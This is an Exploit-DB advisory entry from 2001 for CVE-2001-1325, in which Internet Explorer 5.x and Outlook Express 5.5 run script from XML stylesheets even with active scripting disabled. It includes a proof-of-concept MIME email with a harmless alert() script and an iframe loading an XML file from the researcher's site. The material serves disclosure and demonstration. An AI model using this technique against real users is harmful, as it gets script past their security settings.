Microsoft Internet Explorer 5.0/5.5 and OE 5.5 XML Stylesheets Active Scripting Vulnerability

2001-04-20T00:00:00
ID EDB-ID:20782
Type exploitdb
Reporter Georgi Guninski
Modified 2001-04-20T00:00:00

Description

Microsoft IE 5.0/5.5 and OE 5.5 XML Stylesheets Active Scripting Vulnerability. CVE-2001-1325. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/2633/info

A vulnerability exists in the handling of XML stylesheets in Internet Explorer and Outlook Express. If active scripting is disabled in all security zones, IE and OE will still allow script to run if it is contained in the stylesheet of an XML page. 

From: "georgi" 
Subject: xstyle
Date: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000"
X-Priority: 3
X-MSMail-Priority: Normal



This is a multi-part message in MIME format.

------=_NextPart_000
Content-Type: text/html;
	charset="iso-8859-1"


test
<H1>
XStyle demo. Written by Georgi Guninski
</H1>

<SCRIPT>
alert("JS should not be working");
</SCRIPT>



<IFRAME SRC="http://www.guninski.com/xstyle.xml"></IFRAME>
------=_NextPart_000--